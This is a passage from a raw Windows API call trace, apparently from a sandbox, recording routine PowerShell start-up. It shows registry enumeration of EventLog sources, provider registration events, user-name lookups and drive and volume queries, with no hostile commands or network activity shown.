(cb=0x204) returned 0x26e210 [0103.664] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x4, lpName=0x26e210, lpcchName=0x1acf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1acf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.664] CoTaskMemFree (pv=0x26e210) [0103.664] CoTaskMemFree (pv=0x0) [0103.664] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.664] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x5, lpName=0x26e210, lpcchName=0x1acf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1acf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.664] CoTaskMemFree (pv=0x26e210) [0103.664] CoTaskMemFree (pv=0x0) [0103.664] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.664] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x6, lpName=0x26e210, lpcchName=0x1acf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1acf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.664] CoTaskMemFree (pv=0x26e210) [0103.664] CoTaskMemFree (pv=0x0) [0103.664] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.664] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x7, lpName=0x26e210, lpcchName=0x1acf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1acf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.664] CoTaskMemFree (pv=0x26e210) [0103.664] CoTaskMemFree (pv=0x0) [0103.664] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.664] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x8, lpName=0x26e210, lpcchName=0x1acf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1acf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.664] CoTaskMemFree (pv=0x26e210) [0103.664] CoTaskMemFree (pv=0x0) [0103.664] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x358) returned 0x0 [0103.665] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x0) returned 0x2 [0103.665] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x380) returned 0x0 [0103.665] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x0) returned 0x2 [0103.665] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x384) returned 0x0 [0103.665] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x0) returned 0x2 [0103.665] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x388) returned 0x0 [0103.665] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x0) returned 0x2 [0103.665] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x38c) returned 0x0 [0103.666] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x0) returned 0x2 [0103.666] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x390) returned 0x0 [0103.666] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x0) returned 0x2 [0103.666] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x394) returned 0x0 [0103.666] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x0) returned 0x2 [0103.666] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x398) returned 0x0 [0103.666] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x0) returned 0x2 [0103.666] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x39c) returned 0x0 [0103.666] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x3a0) returned 0x0 [0103.666] RegCloseKey (hKey=0x3a0) returned 0x0 [0103.667] RegCloseKey (hKey=0x37c) returned 0x0 [0103.667] RegCloseKey (hKey=0x39c) returned 0x0 [0103.668] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1aced8 | out: phkResult=0x1aced8*=0x39c) returned 0x0 [0103.668] RegQueryInfoKeyW (in: hKey=0x39c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ace4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ace48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ace4c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ace48*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.668] CoTaskMemFree (pv=0x0) [0103.668] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.668] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x0, lpName=0x26e210, lpcchName=0x1aced8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1aced8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.668] CoTaskMemFree (pv=0x26e210) [0103.668] CoTaskMemFree (pv=0x0) [0103.668] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.668] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x1, lpName=0x26e210, lpcchName=0x1aced8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1aced8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.668] CoTaskMemFree (pv=0x26e210) [0103.668] CoTaskMemFree (pv=0x0) [0103.668] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.668] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x2, lpName=0x26e210, lpcchName=0x1aced8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1aced8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.668] CoTaskMemFree (pv=0x26e210) [0103.668] CoTaskMemFree (pv=0x0) [0103.668] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.668] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x3, lpName=0x26e210, lpcchName=0x1aced8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1aced8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.669] CoTaskMemFree (pv=0x26e210) [0103.669] CoTaskMemFree (pv=0x0) [0103.669] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.669] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x4, lpName=0x26e210, lpcchName=0x1aced8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1aced8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.669] CoTaskMemFree (pv=0x26e210) [0103.669] CoTaskMemFree (pv=0x0) [0103.669] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.669] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x5, lpName=0x26e210, lpcchName=0x1aced8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1aced8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.669] CoTaskMemFree (pv=0x26e210) [0103.669] CoTaskMemFree (pv=0x0) [0103.669] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.669] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x6, lpName=0x26e210, lpcchName=0x1aced8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1aced8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.669] CoTaskMemFree (pv=0x26e210) [0103.669] CoTaskMemFree (pv=0x0) [0103.669] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.669] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x7, lpName=0x26e210, lpcchName=0x1aced8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1aced8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.669] CoTaskMemFree (pv=0x26e210) [0103.669] CoTaskMemFree (pv=0x0) [0103.669] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.669] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x8, lpName=0x26e210, lpcchName=0x1aced8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1aced8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.669] CoTaskMemFree (pv=0x26e210) [0103.669] CoTaskMemFree (pv=0x0) [0103.669] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf38 | out: phkResult=0x1acf38*=0x37c) returned 0x0 [0103.669] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf38 | out: phkResult=0x1acf38*=0x0) returned 0x2 [0103.670] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf38 | out: phkResult=0x1acf38*=0x3a0) returned 0x0 [0103.670] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf38 | out: phkResult=0x1acf38*=0x0) returned 0x2 [0103.670] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf38 | out: phkResult=0x1acf38*=0x3a4) returned 0x0 [0103.670] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf38 | out: phkResult=0x1acf38*=0x0) returned 0x2 [0103.670] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf38 | out: phkResult=0x1acf38*=0x3a8) returned 0x0 [0103.670] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf38 | out: phkResult=0x1acf38*=0x0) returned 0x2 [0103.670] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf38 | out: phkResult=0x1acf38*=0x3ac) returned 0x0 [0103.670] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf38 | out: phkResult=0x1acf38*=0x0) returned 0x2 [0103.670] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf38 | out: phkResult=0x1acf38*=0x3b0) returned 0x0 [0103.671] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf38 | out: phkResult=0x1acf38*=0x0) returned 0x2 [0103.671] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf38 | out: phkResult=0x1acf38*=0x3b4) returned 0x0 [0103.671] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf38 | out: phkResult=0x1acf38*=0x0) returned 0x2 [0103.671] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf38 | out: phkResult=0x1acf38*=0x3b8) returned 0x0 [0103.671] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf38 | out: phkResult=0x1acf38*=0x0) returned 0x2 [0103.671] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf38 | out: phkResult=0x1acf38*=0x3bc) returned 0x0 [0103.671] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf38 | out: phkResult=0x1acf38*=0x3c0) returned 0x0 [0103.671] RegCloseKey (hKey=0x3c0) returned 0x0 [0103.671] RegCloseKey (hKey=0x39c) returned 0x0 [0103.672] RegCloseKey (hKey=0x3bc) returned 0x0 [0103.677] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b840008 [0103.680] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3bfcad8*="WSMan", lpRawData=0x3bfc848) returned 1 [0103.687] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0103.687] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.687] CoTaskMemFree (pv=0x1b7401c0) [0103.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.690] CoTaskMemAlloc (cb=0x804) returned 0x1f1320 [0103.690] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1f1320, nSize=0x1ad1c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad1c8) returned 0x1 [0103.690] CoTaskMemFree (pv=0x1f1320) [0103.690] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.690] GetUserNameW (in: lpBuffer=0x26e210, pcbBuffer=0x1ad208 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad208) returned 1 [0103.691] CoTaskMemFree (pv=0x26e210) [0103.691] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c02010*="Alias", lpRawData=0x3c01da0) returned 1 [0103.693] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0103.693] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.693] CoTaskMemFree (pv=0x1b7401c0) [0103.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.696] CoTaskMemAlloc (cb=0x804) returned 0x1f1320 [0103.696] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1f1320, nSize=0x1ad1c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad1c8) returned 0x1 [0103.696] CoTaskMemFree (pv=0x1f1320) [0103.696] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.696] GetUserNameW (in: lpBuffer=0x26e210, pcbBuffer=0x1ad208 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad208) returned 1 [0103.696] CoTaskMemFree (pv=0x26e210) [0103.697] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c07608*="Environment", lpRawData=0x3c07398) returned 1 [0103.698] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0103.698] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.699] CoTaskMemFree (pv=0x1b7401c0) [0103.700] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0103.700] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0103.700] CoTaskMemFree (pv=0x1b7401c0) [0103.700] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0103.700] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0103.700] CoTaskMemFree (pv=0x1b7401c0) [0103.701] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1acd70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0103.701] SetErrorMode (uMode=0x1) returned 0x1 [0103.701] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1acf80 | out: lpFileInformation=0x1acf80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0103.701] SetErrorMode (uMode=0x1) returned 0x1 [0103.703] GetLogicalDrives () returned 0x4 [0103.703] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1acae0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0103.705] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0103.705] SetErrorMode (uMode=0x1) returned 0x1 [0103.706] CoTaskMemAlloc (cb=0x68) returned 0x1b754360 [0103.706] CoTaskMemAlloc (cb=0x68) returned 0x1b7542f0 [0103.706] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b754360, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1acf50, lpMaximumComponentLength=0x1acf4c, lpFileSystemFlags=0x1acf48, lpFileSystemNameBuffer=0x1b7542f0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1acf50*=0x9c354b42, lpMaximumComponentLength=0x1acf4c*=0xff, lpFileSystemFlags=0x1acf48*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0103.706] CoTaskMemFree (pv=0x1b754360) [0103.706] CoTaskMemFree (pv=0x1b7542f0) [0103.706] SetErrorMode (uMode=0x1) returned 0x1 [0103.707] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0103.708] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acc90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0103.708] SetErrorMode (uMode=0x1) returned 0x1 [0103.708] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1acef0 | out: lpFileInformation=0x1acef0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0103.708] SetErrorMode (uMode=0x1) returned 0x1 [0103.708] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acc90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0103.708] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1acb40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0103.708] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0103.709] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1aca70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0103.709] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0103.710] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acac0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0103.710] SetErrorMode (uMode=0x1) returned 0x1 [0103.710] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1acd20 | out: lpFileInformation=0x1acd20*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0103.710] SetErrorMode (uMode=0x1) returned 0x1 [0103.710] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acac0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0103.710] SetErrorMode (uMode=0x1) returned 0x1 [0103.710] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1acd20 | out: lpFileInformation=0x1acd20*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0103.710] SetErrorMode (uMode=0x1) returned 0x1 [0103.711] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acb60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0103.711] SetErrorMode (uMode=0x1) returned 0x1 [0103.711] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1acdc0 | out: lpFileInformation=0x1acdc0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0103.711] SetErrorMode (uMode=0x1) returned 0x1 [0103.711] CoTaskMemAlloc (cb=0x804) returned 0x1f1320 [0103.711] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1f1320, nSize=0x1ad1c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad1c8) returned 0x1 [0103.712] CoTaskMemFree (pv=0x1f1320) [0103.712] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.712] GetUserNameW (in: lpBuffer=0x26e210, pcbBuffer=0x1ad208 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad208) returned 1 [0103.712] CoTaskMemFree (pv=0x26e210) [0103.713] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c0e6f8*="FileSystem", lpRawData=0x3c0e488) returned 1 [0103.714] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0103.714] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.714] CoTaskMemFree 